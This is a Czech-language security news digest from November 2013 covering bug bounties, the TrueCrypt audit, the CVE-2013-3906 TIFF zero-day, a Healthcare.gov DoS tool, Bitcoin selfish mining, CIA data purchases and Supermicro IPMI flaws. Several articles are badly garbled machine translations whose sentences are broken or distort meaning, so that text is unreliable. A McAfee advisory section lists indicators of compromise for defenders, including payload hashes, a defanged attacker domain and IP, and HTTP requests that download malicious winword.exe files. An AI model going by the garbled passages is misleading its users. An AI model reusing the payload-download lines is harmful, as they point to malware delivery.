Podobnou iniciativu minulý měsíc spustil také Google, který se rozhodl platit za zranitelnosti nalezené ve známých open-sourcových aplikacích a softwarových knihovnách jako OpenSSL, OpenSSH, BIND, libjpeg, libpng a dalších. To je asi také důvodem, proč Google odměnu v rámci programu HackerOne nesponzoruje, i když Chris Evans, člen Google Chrome Security Teamu, je součástí komise HackerOne.
Dva obdobné programy pro své produkty v červnu tohoto roku spustil také Microsoft, platí však za to, že mu experti zašlou nové obranné techniky či metody zneužití kódu, jež umí obejít současnou ochranu. V pondělí společnost jeden z těchto programů rozšířila tak, že vyplácí peníze i nové útočné techniky. Microsoft do června také provozoval klasický program odměn, v rámci kterého platil za chyby objevené v Internet Exploreru 11. Finanční odměny za nalezení chyb zavedla také společnost Yahoo.
Bezpečnostní incidenty pod kontrolou, slibuje RSA
8.11.2013 Ochrany
Nové produkty i služby a jejich možné vzájemné propojení, které podnikům umožní rychleji reagovat na případné incidenty, oznámilo RSA, divize firmy EMC.
Mezi představenými produkty jsou aktualizace řešení RSA Security Analytics, které přichází s novou modulární architekturou a pomáhá tak reagovat na klíčové požadavky v oblasti správy zabezpečení a přihlašování a také snižuje náklady pro dlouhodobé uchovávání dat.
Jde o kombinace prvků pro správu zabezpečení s analytickými funkcemi streamovanými prakticky v reálném čase, což podle výrobce urychluje detekci incidentů a varování.
Vylepšené rozhraní pak zahrnuje vizualizační funkce, které usnadňují rozpoznání podezřelých událostí.
Řešení Security Operations Management a Advanced Cyber Defense – Retainer, jež usnadňují reakci na incidenty, a Start, jež slouží pro zpracování incidentů – zase nově tvoří jednotný systém pro reakci na incidenty včetně poradenských a vzdělávacích služeb.
RSA představila i nové vzdělávací moduly pro analytiky. Mají podle výrobce zlepšovat správu životního cyklu bezpečnostních incidentů – od jejich rozpoznání přes prošetření a reakci až po poučení a úpravu procesů.
Odborníci Přidejte se k hnutí Audit TrueCrypt, možná jiný bezpečnostní software
7.11.2013 Kryptografie | Zabezpečení
Vzhledem k tomu, audit TrueCrypt chugs spolu k deterministický, čisté sestavení open-source šifrovacího softwaru a chutné licence, organizátoři přinesly významné bezpečnosti a právních expertů na palubě jako odborný a poradní tým.
Odborníci nejen poskytnout vodítko pro audit za běžné období, ale může pomoci vyvinout tento projekt do rámce pro zkoumání dalších open source nástrojů zabezpečení.
Úplný seznam svítidel Očekává se, že brzy zveřejní, spolu s novými detaily webových bydlení a pokrok na audit TrueCrypt, ale tento seznam již obsahuje zjištěné kryptografové Bruce Schneier a Jean-Philippe Aumasson, stejně jako bezpečnostní expert Moxie Marlinspike, kdo dělal rozsáhlý výzkum zabezpečených protokolů, soukromí a kryptografie, stejně jako Marcia Hofmann digitálních práv advokát a pracovník na Electronic Frontier Foundation.
"Opravdu se zdálo, že vyvolal tu něco větší, než to, co jsme očekávali," řekl Kenneth White, bezpečnostní expert, který spolu s Johns Hopkins univerzitní profesor a cryptographer Matthew Green pomohl dostat audit TrueCrypt ze země. "Míní se, že možná to, co bychom mohli udělat, je použít audit TrueCrypt jako příklad druhu, jak můžeme udělat open source vyhodnocení a použít jej k pomoci upřesnit, jak bychom mohli udělat v obecnějším způsobem pro další projekty.
"Rozhodně jsem dojem z několika lidí, kteří se podílejí že bych nerad, aby to bylo jednorázové věc. Rádi bychom, aby se tento impuls a maximalizovat pro další projekty. "
Audit TrueCrypt, k dnešnímu dni, zvýšil v blízkosti 60.000 dolary, rozmetal na kusy týmu první gól 25.000 dolarů v prvních čtyřech dnech fundraisingu. Pod záštitou větší dozoru NSA a údajné ohrožení populárních šifrovacích algoritmů špionážní agentury, audit TrueCrypt doufá, že se odpovědět na některé potenciálně problematické otázky týkající se softwaru. Zvláštního zájmu je dokumentován podivné chování podle verze systému Windows, který je sestaven z binárních souborů a není zdrojový kód, na rozdíl od Linux a Mac OS X verze. Windows verze, proto nelze srovnávat zdrojového kódu, a mnozí z nich uvažoval, zda by bylo backdoored v určitém okamžiku.
Spolu s tím, že totožnost jejích vývojářů není jasné, a zatěžující licence řídí TrueCrypt je použití , je audit byl vítán technologů i odborníků. Bílá, například řekl, že byly příspěvky na audit fondu z blízkých 1000 lidí ve 30 zemích. Lidé ze 70 zemí navštívilo aktuální webové stránky, istruecryptauditedyet.com , která vytvořila dva miliony hitů, protože to oživila. Bílá také řekl Threatpost, že audit byl udělen neziskový status státu Severní Karolíny a podal 501 (c) 3 aplikace s IRS pro neziskovou stavu.
"Máme některé docela ambiciózní představy a začneme s TrueCrypt teď," řekl White s tím, že tam byly diskuze a debata o tom, jak moc otevřít auditu jiným subjektům mimo profesionálních softwarových firem, jako je například akademiků nebo bezpečnostní společenství jako celek. "Mám podezření, že to bude nějaký druh rovnováhy, protože máme tolik různých lidí, kteří hledají na to. Někteří lidé se chystáte být splněna, pokud profesionální firma dívá na to. Je to šílené, řada lidí, kteří nabídli pomoci ani finančně, ani s jejich službami. "
Pokud jde o výběr profesionálního softwarového firmy, řekl White existuje několik možností ve hře, včetně oddělení od dešifrování systémového inženýrství jako TrueCrypt je kontrolován, aby bylo možné pokrýt všechny základy.
"Když děláte celý objem boot z Windows, je tu spousta věcí se děje, že má velmi málo co do činění s crypto, jen pokud jde o provádění," řekl White. "Myslím, že tam jsou 75.000 řádků kódu, včetně assembleru, C a C + + na třech různých platformách. Je tu strašně moc budete muset uplatnit, a tam prostě není mnoho lidí, kteří jsou kouzelníci, řekněme, proces spouštění systému Windows a OS X a Linux. To je to, co se snažíme zjistit. Mají lidé s odbornými znalostmi ve všech, ale je to pravděpodobně bude skončit mix akademiků dobrovolníků a profesionálů. "
Pokud to skončí být dlouhodobější iniciativa, další open source projekty tak populární jako TrueCrypt (28 miliony stažení) by mohly být v hledáčku podobného přezkumu.
"Matt a já jsem o tom mluvil a v některých soukromých rozhovorech, návrh byl důvod, proč ne, aby to modelový případ, jak by se dalo udělat správnou otevřenou analýzu zabezpečení," řekl White. "Samozřejmě, několik lidí už o tom mluvili předtím, než jsme vykrystalizoval nápad."
TIFF Zero Day chybí listopadu Patch Tuesday aktualizace
7.11.2013 Zranitelnosti
Patch pro Windows zero-day zveřejněny tento týden nebude včas připravena na příští týden měsíční Patch Tuesday vydání, Microsoft řekl dnes.
Chyba zabezpečení v několika systémů Windows a Office verze je využívána v cílených útoků proti systémech Windows XP sadou Office 2007. Útoky byly omezeny tak daleko na Blízkém východě av Asii. Vydala společnost Microsoft Fix-It nástroj, jako provizorní opatření do náplasti se uvolní mimo pásmo nebo v prosinci aktualizacích zabezpečení.
Microsoft mezitím vydá osm bulletinů příští týden , tři z nich kritické, včetně dalšího Internet Explorer roll-up jít celou cestu zpět do IE 6. Další dvě kritické bulletiny jsou nedostatky v systému Windows, což je první sada patchů v měsících, které nemá vliv na serveru Microsoft Component.
Pokud jde o zero-day chyby, je v rozhraní grafický design, nebo GDI +, nalezeno Office, Windows a Lync. Microsoft objasnil nějaký zmatek podmínek, v nichž byla zjištěna chyba zabezpečení. V kanceláři, například, 2003 a 2007 ovlivněna bez ohledu na základní operační systém. Office 2010 v systému Windows XP nebo Windows Server 2003 je zranitelný, Office 2013 není.
Vista a Windows Server 2008, mezitím obsahovat zranitelnou součást GDI +, ale nejsou napadeni, uvedl Microsoft. Jiné verze Windows nejsou ovlivněny, pokud používáte verzi systému Office nebo Lync, která je ovlivněna. Všechny podporované verze systému Lync podporuje postiženou součást, ale nejsou pod útokem.
Útoky jsou prováděny prostřednictvím infikovaných Word dokumentů odeslaných e-mailových příloh.
"Pokud je příloha otevření nebo náhledu, pokusí zneužít tuto chybu zabezpečení s použitím chybně grafiku (TIFF), vloženého do dokumentu. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jaká má přihlášený uživatel "Microsoft poradní říká.
Útočníci mohou získat schopnost vzdáleně injekci kódu na infikovaný stroj.
Včera se objevily nové detaily z výzkumných pracovníků na AlienVault. Jakmile útočníci mají přítomnost na stroji, malware stažení souboru RAR který se připojuje k serveru útočníka a stáhne další malware, včetně keylogger, backdoor a součásti, které se krade produktivity soubory, jako jsou tabulky, Word docs, Power Point a PDF soubory.
Výzkumníci společnosti Kaspersky Lab říkal, že toto není první exploit pro zranitelnosti TIFF a také našel další škodlivého chování.
"Nová 0den používá chybně TIFF údajů obsažených v dokumentech sady Office, aby se spustit shell kód pomocí haldy sprej a ROP techniky. Již jsme zkoumali některé shellcodes - vykonávají společné akce (pro shellcodes): Vyhledat API funkcí, stáhněte a spusťte náklad, "řekl Vjačeslav Zakorzhevsky, vedoucí skupiny zranitelnosti výzkumu v Kaspersky. "Vzali jsme si pohled na stažené nákladem -. Zadní vrátka a Trojan-špioni"
Výzkumníci FireEye mezitím dnes řekl, že další skupina používá exploit k poklesu bankovního Citadel škodlivého kódu do napadených počítačů, přináší kriminální živly do rovnice vedle cílených útoků špionáže. FireEye řekl, že skupina Arx za tyto útoky měly exploit déle než skupina ho používá v cílených útoků. FireEye řekl 619 byly cíle ohroženo, nejvíce v Indii.
Healthcare.gov Denial-of-Service Tool nevedou k úspěchu
7.11.2013 Hacking | Kriminalita
Arbor Networks Security Engineering a Response Team (asert) objevil denial-of-service nástroj speciálně zaměřit vlády USA zdravotní zápisu tržiště, Healthcare.gov.
Healthcare.gov je stanovena cenově dostupnou péči zákon (ACA) ve Spojených státech, možná lépe známý neologismem "Obamacare." ACA je zvažován mnoho být amerického prezidenta Baracka Obamy koruna úspěch, jehož cílem je zajistit zdravotní pojištění pro miliony nepojištěných Američanů. Rollout webové stránky, které podporuje ACA byl kazen zdánlivě nekonečné a ponižující řadu technických problémů.
Jak přesto, asert nemá žádné informace o tom, že některý z výpadku zažil na Healthcare.gov je výsledek, pokud DoS nebo distribuované odmítnutí služby (DDoS) útok.
Nicméně, nástroj DoS, napsaná převážně v programovacím jazyce Delphi, se objevil, a jeho jediný cíl je posílá zdravotní výměnu offline. Nástroj údajně provádí vrstvu sedm žádostí se dostanete na webové stránky, střídavě healthcare.gov a ten samý webové stránky "Kontaktujte nás" stránce.
ObamaCare_screenShot
Naštěstí pro mnoho zastánců ACA již v rozpacích Exchange problematických začátků, asert tvrdí, že nástroj je nepravděpodobné, že uspět ve svých pokusů dělat Healthcare.gov nedostupný, protože jeho non-distribuované architektury a další limitující faktory.
Podle zprávy, aplikace je k dispozici ke stažení z několika zdrojů a je distribuován na sociálních sítích médií stejně.
"Asert nemá informace o účinné používání tohoto softwaru," Arbor Network Marc EISENBARTHOVÁ psal o asert blogu . "Asert viděl site-specific popření servisních nástrojů v minulosti v souvislosti s tématy společenského a politického zájmu. Tato aplikace pokračuje trend asert je vidět na popření servisních útoků se používá jako prostředek odplaty proti politice, právních rozsudků nebo vládních opatření. "
Vědci Debata Hodnota nový útok Bitcoin
7.11.2013 Počítačový útok
V návaznosti na zveřejnění nového akademického papíru, který říká, že je zásadní chyba v protokolu Bitcoin, která by mohla malá kartel účastníků, aby se stal dost silný, že by mohl převzít těžební proces a získat neúměrné množství hodnoty v systému, vědci debatují o potenciální hodnotu útoku a zda je to opravdu praktické v reálném světě. Papír, publikoval tento týden vědci na Cornellově univerzitě, tvrdí, že Bitcoin je rozbité, ale kritici říkají, že je základním chyba v novinách tvrzení.
Bitcoin je decentralizovaný cryptocurrency, který závisí na poctivosti svým uživatelům publikovat na každém ze svých obchodů v centru, veřejné knihy. Papír Cornell, napsaný Ittay Eyal a Emin Gun sirer, říká, že pokud skupina ovládá jednu třetinu těžby zdrojů Bitcoin, může pak začít těžbu "sobecky" moje bloky a držet je v tajnosti před zbytkem horníků. Pak, když řetěz, který tato skupina těží je delší než jeden veřejný, může publikovat své řetězce a mají autoritativní jedno, protože Bitcoin vždy ignorovat kratší blok řetězce, když je vidlice.
"Ittay Eyal a nastíním o útok, při němž menšinová skupina horníků mohou získat příjmy, než je jejich spravedlivý podíl a růst v řadě, dokud nedosáhnou většinu. Po dosažení tohoto bodu, se Bitcoin hodnotu propozice hroutí: měna je pod kontrolou jediného subjektu, je již decentralizované, ovládající osoba může určit, kdo se podílí na těžbě a které transakce se zavázali, a může dokonce vrátit zpět transakce dle libosti. Tato sněhová scénář nevyžaduje špatně míněný Bond-styl darebáka ke spuštění, ale může probíhat jako důsledek spolupráce lidí se snaží vydělat trochu více peněz pro své těžební činnosti, "píší vědci ve svém blogu na svém papíře .
"Konvenční moudrost již dlouho tvrdil, že Bitcoin je zabezpečen proti skupinám spolčení horníků tak dlouho, dokud se většina horníků jsou čestní (podle upřímný, máme na mysli, že poslušně poslouchat protokol, jak předepsal pseudonymní Nakamoto). Naše práce ukazuje, že toto tvrzení je nesprávné. Ukážeme, že v okamžiku, kdy bude nějaká skupina uzlů, které zaměstnávají naše útok podaří výdělku nad jejich spravedlivý podíl. Jsme také ukázat nový vázaný, který znehodnocuje poctivé většiny tvrzení: V nejlepším případě, přinejmenším 2/3rds zúčastněných uzlů být upřímný k ochraně proti našemu útoku. Ale k dosažení tohoto cíle 2/3 spojený se bude v praxi obtížné. "
Myšlenka většiny horníků Bitcoin spojí ovládat systém není nic nového, ale Cornell výzkumníci říkají, že menší bazén jedné třetiny horníků mohla dosáhnout stejného výsledku, a že jakmile budou mít, tam by efekt sněhové koule s dalšími horníky vstupu do této kartelové dohody ke zvýšení své vlastní kus koláče. Nicméně, jiní výzkumníci vzali problém s touto analýzou, říká, že to nebude držet pohromadě v reálném světě.
"Nejvážnější chybou, snad je to, že na rozdíl od svých nároků, koalice ES-horníků [sobecké horníků] by být stabilní, protože členové koalice bude mít motivaci podvádět na svých koaličních partnerů, a to pomocí strategie, která Zavolám fair-počasí těžbu, "Ed Felten, profesor počítačových věd a veřejných záležitostí na Princetonské univerzitě a ředitel Centra pro politiku informačních technologií, napsal v analýze papíru .
"Připomeňme, že v ES útoku tým ES-horníků je závodění proti týmu obyčejných horníků, aby zjistili, kdo může vytvořit delší blok řetězce. Nepohody horník předstírá, že je součástí koalice Es-horníků, ale ve skutečnosti tajně do jiného týmu, takže dolů na ES těžby týmu li, že tým je dopředu v závodě, a to doly na běžné těžby týmu jinak . Ukazuje se, že každý blok, který nepohody horník vytváří je zaručeno, že skončí na vítězné řetězce. Takže nepohody horník na tom lépe (tj. dostane lepší odměnu), než by mohla získat tím, že hraje pouze na jeden tým. "
Nicméně, mnoho horníků Bitcoin spolupracovat v bazénech nebo spolky, které sdílejí zdroje a odměny. Tyto skupiny se někdy vyžadují, aby jejich uživatelé produkují jedny z práce, kterou jsem udělal, aby dokázal, že oni jsou vlastně podílí na těžbě a měl by získat některé z případných Bitcoin odměny. To by mohlo zmírnit Kontrola integrity proti potenciálním vznikem fair-počasí horníků.
Matthew Green, cryptographer a výzkum profesor na Johns Hopkins University, řekl, že je papír Cornell vyvolává některé zajímavé body, ale že je těžké vědět, jak v reálném světě Bitcoin uživatelé by se jednat, pokud takový kartel vůbec objevil.
"Ed si bere na mušku tomuto závěru poukazem na to, že tato koalice nebude stabilní. V reálném životě, budou sobecké individuální horníci hop tam a zpět mezi sobeckým a čestný těžby tak, aby vyhovovaly jejich vlastní účely. To poskakování působí jako nárazník proti dalšímu koulování, "řekl Green e-mailem.
"Jsem moc těší se na odpověď autorů. Myslím, že oba mají dobré body, ale oni oba pracovali se zjednodušenými modely reálného světa. Co budu říkat, že Bitcoin není tak snadné modelu. Pro jednu věc, není to sbírka racionálních uzlů pracujících ve svém vlastním zájmu. Ve skutečnosti je Bitcoin dnes do značné míry řídí lidé přispívají volné pracovní síly bez náhrady - uložení bloku řetěz, směrování transakcí, atd. skutečně vlastní zájem kolekce uzlů by působit jinak. Takže tyto výsledky jsou pravděpodobně mnoho znamenat dnes. "
Nakonec řekl Green, další analýzy, je třeba systému Bitcoin a potenciální zranitelnosti, které mohou ležet v něm.
"Myslím, že je to fantastické, že vědci konečně analyzuje Bitcoin jako systém. To neznamená, že jsme pravděpodobně vidět praktické útoky v dohledné době, "řekl Green. "Skutečnost, že Bitcoin funguje, je úžasná. Neměli bychom být překvapeni, pokud existuje několik Kinks fungovat. "
Ačkoli technologie základní Bitcoin je životně důležité, existuje celá řada dalších faktorů, které by mohly přispět k problémům se systémem.
"Stejně jako u všech ostatních vědeckých výzkum, jeden z údajného Bitcoin vady musí být přezkoumány a analyzovány komunity. Ale již vidíme, že povaha tohoto "zranitelnosti" se nachází v oblasti ekonomie, spíše než výpočetní techniky. I když některé skupiny lidí (nebo spíše, silný vládní jednotky s téměř nekonečnou výpočetní výkon) by mohl získat určitou kontrolu nad Bitcoin zpracovávají důlní by to nutně znamenat zánik a pád digitální měně, "řekl Sergey Lozhkin, Senior Security výzkumný pracovník společnosti Kaspersky Lab.
CIA platí telekomunikacím AT&T za přístup k datům
7.11.2013 Špionáž
Americká Ústřední zpravodajská služba (CIA) platí ročně přes deset miliónů dolarů (200 miliónů Kč) druhému největšímu americkému telekomunikačnímu operátorovi AT&T za přístup k datům o telefonických hovorech mimo USA. Napsal to ve čtvrtek deník New York Times s odvoláním na nejmenované vládní činitele.
AT&T podle listu spolupracuje se CIA na základě dohody, ne z nařízení soudu. Zpravodajská služba poskytuje operátorovi telefonní čísla lidí v zahraničí podezřelých z terorismu a AT&T se ve své rozsáhlé databázi snaží najít, s kým hovořili. Nejde přitom jen o data klientů společnosti, ale i dalších poskytovatelů, jejichž hovory AT&T zprostředkovává.
Podle zdrojů New York Times se většinou jedná o telefonáty cizinců s cizinci. Pokud je telefonující z USA, operátor jeho číslo prý zamaskuje.
AT&T zprávu nepotvrdila, ani nevyvrátila. Její mluvčí agentuře Reuters pouze sdělil, že veškeré předávání informací se děje v souladu se zákony Spojených států a dalších zemí. "Stejně jako další telefonní operátoři běžně účtujeme poplatky úřadům za poskytování informací," dodal mluvčí Mark Siegel.
CIA odmítla tuto spolupráci potvrdit. Její mluvčí Dean Boyd nicméně zdůraznil, že ke sbírání zpravodajských dat dochází v souladu se zákonem a že tato činnost podléhá rozsáhlé kontrole.
CIA a NSA se dublují
Podle New York Times dává odhalení tohoto programu CIA novou dimenzi debatám o sledování telefonické a internetové komunikace americkými tajnými službami po celém světě, které se zatím soustředily hlavně na aktivity Národní agentury pro bezpečnost (NSA).
Newyorský deník soudí, že program CIA "dubluje" činnost NSA. Nejmenovaný pracovník zpravodajských služeb ale považuje za logické, že CIA má vlastní program vyhledávání komunikace lidí v zahraničí podezřelých z terorismu. "Potřeba jednat bezodkladně se nejlépe realizuje, když má CIA vytvořené vlastní kapacity k zákonnému získávání důležitých zahraničních zpravodajských informací," uvedl zdroj New York Times.
Podle tiskové agentury DPA přišlo v nevhodný čas pro AT&T, která podle médií plánuje převzít konkurenčního telekomunikačního giganta Vodafone.
Aktualizace a zmírňování s cílem CVE-2013-3906 Zero-Day ohrožení
7.11.2013 Zranitelnosti
Dne 5. listopadu, Microsoft vykázala Security Advisory 2896666 . Tato chyba zabezpečení, objevený Haifei Li McAfee Labs, ovlivní více verzí sady Microsoft Office, Windows a Lync. Úspěšné zneužití může mít za následek schopnost spustit libovolný kód na zranitelné hostitele (vzdálené spuštění kódu).
Problematika (číslo přetečení), spočívá v manipulaci s upraveného TIFF soubory. Vzdálený útočník může potenciálně zneužít tuto chybu pomocí speciálně navrženého e-mailové zprávy, distribuce škodlivého binární, nebo přes speciálně vytvořenou webovou stránku. Úspěšné zneužití této chyby zabezpečení bude mít útočník na získání stejná uživatelská práva, jako aktuálního uživatele.
Náš blog post ( McAfee Labs Detekuje zero-day exploit cílení Microsoft Office ) popisuje problém podrobněji:
McAfee Seznam výrobků / Zmírnění
McAfee VirusScan (Aktualizováno 5.listopadu)
MD5: 97bcb5031d28f55f20e6f3637270751d (Payload) - BackDoor-FBKI 920FEFDC36DA!
MD5: cb28d93d9eb3c38058a24ad3b05ec3eb (Payload) - Generic Backdoor.u
MD5: 5ba7ed3956f76df0e12b8ae7985aa171 (Payload) - Artemis 5BA7ED3956F7!
MD5: 5a95ca7da496d8bd22b779c4e6f41df9 (Payload) - Generic Backdoor.u
MD5: b44359628d7b03b68b41b14536314083 (Office Document) - Exploit-CVE2013-3906
MD5: 1FD4F3F063D641F84C5776C2C15E4621 (Office Document) - Exploit-CVE2013-3906
McAfee Network Security Platform (Aktualizováno 5.listopadu )
UDS-ShantiMalwareDetected
McAfee Vulnerability Manager (Aktualizováno 5.listopadu )
MVM / FSL Podívejte se uvolnit 11.05.2013
Obecné indikátory:
MD5 hash seznam:
b44359628d7b03b68b41b14536314083
97bcb5031d28f55f20e6f3637270751d
cb28d93d9eb3c38058a24ad3b05ec3eb
1FD4F3F063D641F84C5776C2C15E4621
5ba7ed3956f76df0e12b8ae7985aa171
5a95ca7da496d8bd22b779c4e6f41df9
4f73248a2641a5bc1a14bda3ef11f454 (Embedded)
6cad22128a105c455bd4a5152272239d (Embedded)
7523a56ea1526fa027735e09bffff00e (Embedded)
abc311f99a72002457f28fe26bd2e59d (Embedded)
c035acd1c10d8b17773d23be4059754f (Embedded)
e6fa16d2e808103ab9bec5676146520b (Embedded)
Síť:
hxxp: [.] / / myflatnet com
31 [.] 210 [.] 96. [.] 213
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / ralph_3 / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / new_red / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / bruce_3 / winword.exe
http dotaz: hxxp: [.] / / myflatnet com [:] 80 GET / modrá / winword.exe
Apple vydal souhrn vyžádaných údajů uživatelů
7.11.2013 OS | Mobil
Za první polovinu roku 2013 odtajnil Apple americké vládě obsah z účtů svých uživatelů méně než tisíckrát. Vyplývá to ze zprávy zabývající se požadavky státních organizací, kterou společnost vydala v úterý.
„Apple se sběrem informací primárně nezabývá,“ uvedla společnost ve zprávě. Dodala, že doufá, že poskytnutím detailů o svých interakcích nejen s vládou USA, ale se všemi vládami po celém světě, poskytne svým zákazníkům lepší přehled o schvalovacích procesech. Apple také oznámil, že zástupci společnosti opakovaně nadnesli návrh, že by společnost měla být otevřenější ohledně svých schůzek s vládními zastupiteli.
Stejně jako Google, Microsoft nebo Facebook, i Apple podal žádost o možnost větší transparentnosti k soudu pro zahraniční zpravodajství. „Jsme pevně přesvědčeni, že by vláda měla povolit odtajnění kompletních a přesných čísel vztahujících se k žádostem státní správy,“ napsal Apple. „Budeme pokračovat v důrazných snahách o prosazení větší transparentnosti.“
Společnost ve zprávě vysvětlila, že podle americké vlády může údaje zveřejnit pouze velmi obecně. Přesný počet žádostí, které společnost obdržela, i počet účtů, kterých se žádosti týkaly, jsou tak nedostupné, což komplikuje snahu o získání přesného obrazu akcí státu. Zpráva však naznačuje, že požadavky od americké vlády jsou pouhým zlomkem toho, co požadují ostatní země.
Během doby, kterou zpráva zahrnuje, obdržel Apple 1 000 až 2 000 požadavků, které se týkaly dvou až tří tisíc účtů. „Požadavky se nejčastěji týkají krádeží nebo jde o žádosti od policejních úředníků, kteří pátrají po nezvěstných osobách,“ zmínila zpráva. „Pouze velmi zřídka nám přijde žádost o poskytnutí uložených fotografií nebo e-mailů, tyto požadavky pak zvažujeme velmi opatrně. Takový obsah poskytujeme pouze ve velmi výjimečných případech.“
Ve Spojených státech Apple obdržel také 3 542 žádostí o poskytnutí informací o zařízení. Obvykle se jedná o ztracené či odcizené telefony, společnost vyhověla v 88 % těchto případů.
„Vládní agentura, která požaduje obsah našich zákazníků ze zařízení Applu, musí mít soudní příkaz,“ napsala společnost. „Pokud takový požadavek obdržíme, náš právní tým příkaz pečlivě přezkoumá a pokud nalezne jakékoliv sporné místo nebo se nám nezdá rozsah požadavku, tak příkaz zpochybníme. Pouze pokud jsme si jisti, že je soudní příkaz oprávněný a přiměřený informace v tom nejnutnějším rozsahu poskytneme.“
Apple také dodal, že ještě nikdy neobdržel požadavek, který by se opíral o sekci 215 protiteroristického zákona, jenž teoreticky umožňuje FBI získat veškeré záznamy jakékoliv osoby, aniž by o tom věděla. Apple také podotkl, že by takovému požadavku bez boje nevyhověl.
Plná zpráva je v angličtině na webových stránkách společnosti (ve formátu PDF).
Microsoft varuje před útoky kyberzločinců
7.11.2013 Bezpečnost | Hacking | Počítačový útok
Internetoví útočníci by podle Microsoftu mohli zneužít zranitelnosti v operačním systému Windows k získání kontroly nad uživatelskými počítači.
Pro získání přístupu do uživatelského zařízení by podle společnosti stačilo, aby si oběť zobrazila nebo otevřela speciálně upravený e-mail či webový obsah.
Problém se týká operačních systémů Windows Vista, Windows Server 2008, a produktů Microsoft Office 2003 – 2010 a Microsoft Lync. Uživatelé novějších verzí zmíněných produktů tak mohou zůstat v klidu.
Chyba, kterou by útočníci mohli potenciálně zneužít, se nachází v grafické komponentě. Kompletní a podrobný seznam všech ohrožených programů je na oficiálních stránkách Microsoftu.
Microsoft prý již pracuje na odstranění zranitelnosti. Pravděpodobným řešením je prý zahrnutí potřebné opravy do měsíčních aktualizací nebo vydání bezpečnostní aktualizace mimo tento systém. Do té doby však společnost uživatelům radí, aby provedli takové úpravy v nastavení ohrožených produktů, které sice chybu zcela neeliminují, ale pomůžou zabránit případným útokům.
Chyba je podle Microsoftu ve způsobu, jakým grafické komponenty nakládají se soubory ve formátu TIFF (Tagged Image File Format). K zneužití této zranitelnosti je prý ale potřeba přimět oběť k provedení určitých kroků. V praxi to znamená, že by uživatelé neměli otevírat zprávy s podezřelými příponami, ani by si neměli zobrazovat jejich náhled.
Útok je teoreticky možné vést i prostřednictvím falešných webových stránek. Pokud by se operace zdařila, získal by útočník stejná práva k napadenému zařízení jako má jeho skutečný majitel.
Sedm IPMI Firmware lhůt Odhalené
6.11.2013 Zranitelnosti
Metasploit tvůrce HD Moore dnes zveřejněny sedm zero-day zranitelnosti v IPMI firmware od dodavatele Super Micro . Bezpečnostní otázky byly u prodejce v srpnu, ale prodejce, za potvrzující přijetí zranitelnosti nikdy sděleny s Metasploit o opravu.
Super Micro zástupce řekl Threatpost, že to byl "starý příběh" a že problém byl vyřešen. Žádost o další připomínky od Super Micro projektový manažer nebyl vrácen včas pro vydání a dostupnost záplat nemohly být potvrzeny.
"Dodavatel byl celkem klid na to, že potvrdil přijetí zranitelnosti, ale je to dlouhé a krátké na to. Řekli pro nás nic o záplatou, "řekl senior manažer Metasploit inženýrských Tod Beardsley. "Dovedu si představit, že budu záplatování tiše, ale upřímně, pokud to vydávat záplaty a dělat hodně hluku o tom, nikdo aktualizace takové věci. Je to vestavěný hardware, který sedí na více tradiční hardware, ale jako něco vloženého, nikdo se patche pro tyto případy. Pracoval jsem v IT let, a myslím, že jsem aktualizoval BIOS jednou. "
IPMI, nebo inteligentní platformu rozhraní pro správu, jsou malé počítače, které sedí na základní desce, které jsou používány správci IT ve velkých datových centrech pro vzdálenou správu serverů nebo na dálkovém BIOS údržbu. Jsou většinou přítomny v rack-mount servery, a jsou těžkopádné aktualizovat, protože často vyžadují fyzický přístup k hardwaru, v prostředí poskytovatele služeb, například, tam mohl být stovky těchto embedded zařízení přítomných.
Beardsley řekl, že projekt Sonar skenování firmware IPMI v otázce, verze SMT_X9_226, našel 35.000 z nich online. Se odhaduje, že počet pravděpodobně představuje méně než 10 procent z celkového počtu zařízení v provozu.
I když se jedná již nehlášeného zranitelná-Metasploit exploitu moduly jsou v pracích, řekl Moore, jejich využívání vyžaduje trochu pochopení na straně útočníka.
"Určitě musíte vědět, co děláte, je to jiná architektura," řekl Beardsley. "Většina Exploit vývojáři a zranitelnost výzkumníci jsou obeznámeni s procesory Intel x86 nebo Intel 64-bit nebo ARM, protože Android běží na ARM, tak je to populární. Ale tyto věci běží na docela neobvyklém hardwaru pro INFOSEC kluky. Jak spolehlivé zneužitelnosti je obtížné. Nečekám, že se jedná o červa v příštích šesti hodin, nebo tak něco. Byli jsme sedí na nich na chvíli a snažil se získat spolehlivé využije. Můžeme dojít k selhání po celý den, ale to je k ničemu. Jak spolehlivé využije je složité. Byli jsme tam a zpět mezi emulované prostředí a reálných prostředích a věci, které se zdají fungovat skvěle v emulované prostředí jen spadnout na fyzickém zařízení. Bude to trvat nějakou snahu o jistý. "
Nicméně, pokud je útočník schopen využít jeden z chyb IPMI zveřejněné, by nejen na síti, ale může převzít kontrolu daném serveru na úrovni systému BIOS.
Ze sedmi popsaných chyb, nejvážnější zahrnovat statické soukromé šifrovací klíče napevno do firmwaru, jak pro lighttpd serveru webového rozhraní SSL a SSH démona Dropbear, řekl Moore.
"Útočník s přístupem k veřejně dostupné firmware Supermicro mohou provádět man-in-the-middle a offline dešifrování sdělení firmware," řekl Moore v blogpost.
Beardsley řekl, že i když je možné, že admin aktualizovat SSL klíč pro webové rozhraní, se nezdá možné aktualizovat SSH klíč.
"Takže až budete vědět, soukromý klíč, který můžete snadno extrahovat z firmwaru, je to konec hry a mohu SSH na některou z těchto zařízení," řekl.
Metasploit také uvedl, že firmware obsahuje dva napevno sady pověření pro rozhraní OpenWSMan, jeden pro soubor ověřování algoritmem Digest, který nemůže být změněn uživatelem a chová se v podstatě jako zadní vrátka, zatímco druhá zahrnuje základní ověřování hesla soubor uložený na na firmware . Moore řekl, že změna administrátorského hesla účtu stále zůstává OpenWSMan heslo stále nastavena na serveru.
Moore také zveřejněny dvě chyby zabezpečení přetečení vyrovnávací paměti v každém z login.cgi, close_window.cgi a logout.cgi CGI aplikace, stejně jako adresář traversal zranitelnost v url_redirect.cgi aplikace CGI a četné nespoutaný strcpy (), () a memcpy sprint () volá více než 65 dalších CGI aplikace dostupné přes webové rozhraní.
"Tyto věci jsou skutečné počítače a mají cenné souborové systémy," řekl Beardsley. "Můžete se omezovat jen na toto zařízení, která žije na základní desce, nebo v mnoha případech můžete použít ke správě serveru. To je to, co oni jsou tam, pro správu serveru. Je to docela malý krůček od získání do do IPMI k získání na serveru správné. "
NSA ředitel popírá Špehování evropské občany
6.11.2013 Kryptografie | KyberSecurity
